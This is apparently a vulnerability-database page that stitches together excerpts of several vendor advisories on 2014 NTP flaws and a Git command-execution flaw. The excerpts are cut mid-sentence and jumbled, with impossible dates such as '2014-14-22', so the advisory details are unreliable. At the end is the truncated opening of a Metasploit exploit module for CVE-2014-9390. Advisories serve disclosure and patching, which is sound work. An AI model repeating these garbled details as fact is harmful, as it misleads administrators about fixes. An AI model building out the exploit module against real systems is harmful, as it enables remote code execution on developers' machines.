VARIoT IoT vulnerabilities database
| VAR-201412-0614 | CVE-2014-9294 | NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated) |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
util/ntp-keygen.c in ntp-keygen in NTP before 4.2.7p230 uses a weak RNG seed, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. NTP is prone to a predictable random number generator weakness.
An attacker can exploit this issue to guess generated MD5 keys that could then be used to spoof an NTP client or server.
Corrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE)
2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3)
2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15)
2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE)
2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7)
2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17)
2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24)
2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE)
2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21)
CVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
II. [CVE-2014-9293]
The ntp-keygen(8) utility is also affected by a similar issue.
[CVE-2014-9294]
When Autokey Authentication is enabled, for example if ntp.conf(5) contains
a 'crypto pw' directive, a remote attacker can send a carefully
crafted packet that can overflow a stack buffer. [CVE-2014-9296]
III. Impact
The NTP protocol uses keys to implement authentication. The weak
seeding of the pseudo-random number generator makes it easier for an
attacker to brute-force keys, and thus may broadcast incorrect time stamps
or masquerade as another time server. [CVE-2014-9295]
IV. Workaround
No workaround is available, but systems not running ntpd(8) are not
affected. Because the issue may lead to remote root compromise, the
FreeBSD Security Team recommends system administrators to firewall NTP
ports, namely tcp/123 and udp/123 when it is not clear that all systems
have been patched or have ntpd(8) stopped.
V.
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch
# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc
# gpg --verify ntp.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart the ntpd(8) daemons, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276073
releng/8.4/ r276154
stable/9/ r276073
releng/9.1/ r276155
releng/9.2/ r276156
releng/9.3/ r276157
stable/10/ r276072
releng/10.0/ r276158
releng/10.1/ r276159
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. 6.5) - i386, noarch, ppc64, s390x, x86_64
3. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: ntp security update
Advisory ID: RHSA-2014:2024-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-2024.html
Issue date: 2014-12-20
CVE Names: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295
CVE-2014-9296
=====================================================================
1. Summary:
Updated ntp packages that fix several security issues are now available
for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
3. Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time
with a referenced time source.
Multiple buffer overflow flaws were discovered in ntpd's crypto_recv(),
ctl_putdata(), and configure() functions. A remote attacker could use
either of these flaws to send a specially crafted request packet that could
crash ntpd or, potentially, execute arbitrary code with the privileges of
the ntp user. Note: the crypto_recv() flaw requires non-default
configurations to be active, while the ctl_putdata() flaw, by default, can
only be exploited via local attackers, and the configure() flaw requires
additional authentication to exploit. (CVE-2014-9295)
It was found that ntpd automatically generated weak keys for its internal
use if no ntpdc request authentication key was specified in the ntp.conf
configuration file. A remote attacker able to match the configured IP
restrictions could guess the generated key, and possibly use it to send
ntpdc query or configuration requests. (CVE-2014-9293)
It was found that ntp-keygen used a weak method for generating MD5 keys. Note: it is
recommended to regenerate any MD5 keys that had explicitly been generated
with ntp-keygen; the default installation does not contain such keys).
(CVE-2014-9294)
A missing return statement in the receive() function could potentially
allow a remote attacker to bypass NTP's authentication mechanism.
(CVE-2014-9296)
All ntp users are advised to upgrade to this updated package, which
contains backported patches to resolve these issues. After installing the
update, the ntpd daemon will restart automatically.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth()
1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys
1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets
1176040 - CVE-2014-9296 ntp: receive() missing return on error
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ntp-4.2.6p5-2.el6_6.src.rpm
i386:
ntp-4.2.6p5-2.el6_6.i686.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm
ntpdate-4.2.6p5-2.el6_6.i686.rpm
x86_64:
ntp-4.2.6p5-2.el6_6.x86_64.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm
ntp-perl-4.2.6p5-2.el6_6.i686.rpm
noarch:
ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ntp-4.2.6p5-2.el6_6.src.rpm
x86_64:
ntp-4.2.6p5-2.el6_6.x86_64.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
noarch:
ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ntp-4.2.6p5-2.el6_6.src.rpm
i386:
ntp-4.2.6p5-2.el6_6.i686.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm
ntpdate-4.2.6p5-2.el6_6.i686.rpm
ppc64:
ntp-4.2.6p5-2.el6_6.ppc64.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm
ntpdate-4.2.6p5-2.el6_6.ppc64.rpm
s390x:
ntp-4.2.6p5-2.el6_6.s390x.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm
ntpdate-4.2.6p5-2.el6_6.s390x.rpm
x86_64:
ntp-4.2.6p5-2.el6_6.x86_64.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm
ntp-perl-4.2.6p5-2.el6_6.i686.rpm
noarch:
ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
ppc64:
ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm
ntp-perl-4.2.6p5-2.el6_6.ppc64.rpm
s390x:
ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm
ntp-perl-4.2.6p5-2.el6_6.s390x.rpm
x86_64:
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ntp-4.2.6p5-2.el6_6.src.rpm
i386:
ntp-4.2.6p5-2.el6_6.i686.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm
ntpdate-4.2.6p5-2.el6_6.i686.rpm
x86_64:
ntp-4.2.6p5-2.el6_6.x86_64.rpm
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm
ntp-perl-4.2.6p5-2.el6_6.i686.rpm
noarch:
ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm
ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
ntp-4.2.6p5-19.el7_0.src.rpm
x86_64:
ntp-4.2.6p5-19.el7_0.x86_64.rpm
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-19.el7_0.noarch.rpm
ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
sntp-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
ntp-4.2.6p5-19.el7_0.src.rpm
x86_64:
ntp-4.2.6p5-19.el7_0.x86_64.rpm
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-19.el7_0.noarch.rpm
ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
sntp-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
ntp-4.2.6p5-19.el7_0.src.rpm
ppc64:
ntp-4.2.6p5-19.el7_0.ppc64.rpm
ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm
ntpdate-4.2.6p5-19.el7_0.ppc64.rpm
s390x:
ntp-4.2.6p5-19.el7_0.s390x.rpm
ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm
ntpdate-4.2.6p5-19.el7_0.s390x.rpm
x86_64:
ntp-4.2.6p5-19.el7_0.x86_64.rpm
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-19.el7_0.noarch.rpm
ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
ppc64:
ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm
sntp-4.2.6p5-19.el7_0.ppc64.rpm
s390x:
ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm
sntp-4.2.6p5-19.el7_0.s390x.rpm
x86_64:
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
sntp-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
ntp-4.2.6p5-19.el7_0.src.rpm
x86_64:
ntp-4.2.6p5-19.el7_0.x86_64.rpm
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-19.el7_0.noarch.rpm
ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm
sntp-4.2.6p5-19.el7_0.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-9293
https://access.redhat.com/security/cve/CVE-2014-9294
https://access.redhat.com/security/cve/CVE-2014-9295
https://access.redhat.com/security/cve/CVE-2014-9296
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUlOKcXlSAg2UNWIIRAvBoAKCfw+j4ua5JaIRMc5eKkny9G1yWlgCgufNc
EvBImTd+Vq7//UExow1FP4U=
=m/Eb
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. This situation may be exploitable by an attacker
(CVE-2014-9296).
Stephen Roettger of the Google Security Team, Sebastian Krahmer of
the SUSE Security Team and Harlan Stenn of Network Time Foundation
discovered that the length value in extension fields is not properly
validated in several code paths in ntp_crypto.c, which could lead to
information leakage or denial of service (CVE-2014-9297).
Stephen Roettger of the Google Security Team reported that ACLs based
on IPv6 ::1 (localhost) addresses can be bypassed (CVE-2014-9298).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9297
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9298
http://advisories.mageia.org/MGASA-2014-0541.html
http://advisories.mageia.org/MGASA-2015-0063.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
8f7d14b95c55bd1de7230cff0c8ea9d7 mbs2/x86_64/ntp-4.2.6p5-16.1.mbs2.x86_64.rpm
09063ab11459b1f935809b37c742ff12 mbs2/x86_64/ntp-client-4.2.6p5-16.1.mbs2.x86_64.rpm
7a0d0eca35911d9f15b76b474c5512cf mbs2/x86_64/ntp-doc-4.2.6p5-16.1.mbs2.noarch.rpm
cb0371050702950084ff633ea45c2c5c mbs2/SRPMS/ntp-4.2.6p5-16.1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVF9K3mqjQ0CJFipgRAn26AJwInkxLvDh/Gbb3uYRz9IjuaSK8+ACgiM1Z
rou2syvF1hyhVhxh7M5sv3c=
=uncU
-----END PGP SIGNATURE-----
. Attackers could use this key to
reconfigure ntpd (or to exploit other vulnerabilities).
The default ntpd configuration in Debian restricts access to localhost
(and possible the adjacent network in case of IPv6).
For the stable distribution (wheezy), these problems have been fixed in
version 1:4.2.6.p5+dfsg-2+deb7u1.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/ntp-4.2.8-i486-1_slack14.1.txz: Upgraded.
In addition to bug fixes and enhancements, this release fixes
several high-severity vulnerabilities discovered by Neel Mehta
and Stephen Roettger of the Google Security Team.
For more information, see:
https://www.kb.cert.org/vuls/id/852879
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 13.0 package:
18d7f09e90cf2434f59d7e9f11478fba ntp-4.2.8-i486-1_slack13.0.txz
Slackware x86_64 13.0 package:
edd178e3d2636433dd18f52331af17a5 ntp-4.2.8-x86_64-1_slack13.0.txz
Slackware 13.1 package:
4b6da6fa564b1fe00920d402ff97bd43 ntp-4.2.8-i486-1_slack13.1.txz
Slackware x86_64 13.1 package:
292ae7dbd3ea593c5e28cbba7c2b71fa ntp-4.2.8-x86_64-1_slack13.1.txz
Slackware 13.37 package:
294b8197d360f9a3cf8186619b60b73c ntp-4.2.8-i486-1_slack13.37.txz
Slackware x86_64 13.37 package:
7cd5b63f8371b1cc369bc56e4b4efd5a ntp-4.2.8-x86_64-1_slack13.37.txz
Slackware 14.0 package:
32eab67538c33e4669bda9200799a497 ntp-4.2.8-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
33ecf4845fa8533a12a98879815bde08 ntp-4.2.8-x86_64-1_slack14.0.txz
Slackware 14.1 package:
f2b45a45c846a909ae201176ce359939 ntp-4.2.8-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
12d7ab6e2541af4d1282621d3773e7f7 ntp-4.2.8-x86_64-1_slack14.1.txz
Slackware -current package:
5b2150cee9840d8bb547098cccde879a n/ntp-4.2.8-i486-1.txz
Slackware x86_64 -current package:
9ce09c5d6a60d3e2117988e4551e4af1 n/ntp-4.2.8-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg ntp-4.2.8-i486-1_slack14.1.txz
Then, restart the NTP daemon:
# sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address.
Release Date: 2015-09-09
Last Updated: 2015-09-09
Potential Security Impact: Remote denial of service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with the TCP/IP
Services for OpenVMS running NTP. These vulnerabilities could be exploited
remotely to allow unauthenticated attackers to execute code with the
privileges of ntpd or cause a Denial of Service (DoS).
References:
CVE-2014-9293
CVE-2014-9294
CVE-2014-9295
CVE-2014-9296
CVE-2013-5211
SSRT102239
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
TCP/IP Services for OpenVMS V5.7 ECO5 running NTP
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-5211 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following patch kits available to resolve the vulnerabilities
with TCP/IP Services for OpenVMS running NTP.
Platform
Patch Kit Name
Alpha IA64 V8.4
75-117-380_2015-08-24.BCK
NOTE: Please contact OpenVMS Technical Support to request these patch kits.
HISTORY
Version:1 (rev.1) - 9 September 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201412-34
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: NTP: Multiple vulnerabilities
Date: December 24, 2014
Bugs: #533076
ID: 201412-34
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in NTP, the worst of which
could result in remote execution of arbitrary code. The net-misc/ntp package contains the official reference
implementation by the NTP Project.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8 >= 4.2.8
Description
===========
Multiple vulnerabilities have been discovered in NTP. Please review the
CVE identifiers referenced below for details.
Resolution
==========
All NTP users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8"
References
==========
[ 1 ] CVE-2014-9293
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293
[ 2 ] CVE-2014-9294
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294
[ 3 ] CVE-2014-9295
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295
[ 4 ] CVE-2014-9296
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-34.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-202002-0749 | CVE-2014-9390 | Remote for multiple products Git Vulnerability to execute arbitrary command on server |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files.
Successful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data. This issue was
addressed by adding additional checks.
CVE-ID
CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of
Mercurial
Xcode 6.2 beta 3 may be obtained from:
https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "6.2 (6C101)".
Background
==========
Git is a free and open source distributed version control system
designed to handle everything from small to very large projects with
speed and efficiency. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(
info,
'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',
'Description' => %q(
This module exploits CVE-2014-9390, which affects Git (versions less
than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions
